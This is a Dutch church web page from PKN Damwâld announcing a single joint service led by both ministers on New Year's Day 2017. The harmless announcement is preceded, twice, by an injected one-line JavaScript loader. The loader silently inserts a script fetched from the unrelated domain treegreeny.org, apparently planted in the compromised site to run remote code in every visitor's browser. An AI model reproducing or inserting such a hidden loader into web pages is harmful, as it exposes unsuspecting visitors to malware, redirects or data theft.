;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Nieuwjaarsdag ... een bijzondere kerkdienst ! - PKN Damwâld

Nieuwjaarsdag … een bijzondere kerkdienst !

Gepubliceerd op: maandag 19 december 2016

Nieuwjaarsdag valt dit jaar op zondag. Dit is geen verrassende constatering, het staat al tijden lang op de kalender. Het heeft ons als kerkenraden van beide PKN kerken in Damwâld gebracht bij de vraag ‘wat willen we met de kerkdiensten op deze zondag’? We kunnen deze zondag invullen als een reguliere zondag, dus twee diensten om 9.30 uur en 14.00 uur. We kunnen deze zondag invullen als een nieuwjaarsdag: dus één dienst op een ander willekeurig tijdstip.
We hebben ervoor gekozen om het iets anders te doen. We kiezen voor één dienst die later begint, namelijk om 11.00 u. De dienst wordt gehouden in de Bonifatiuskerk en wordt geleid door de beide dominees (wat niet betekent dat de dienst ook twee keer zo lang gaat duren!). Zo kunnen we gezamenlijk een start maken met het nieuwe jaar. We hopen dat het iets latere tijdstip uitnodigt tot het bijwonen van deze dienst. Een bijzondere zondag!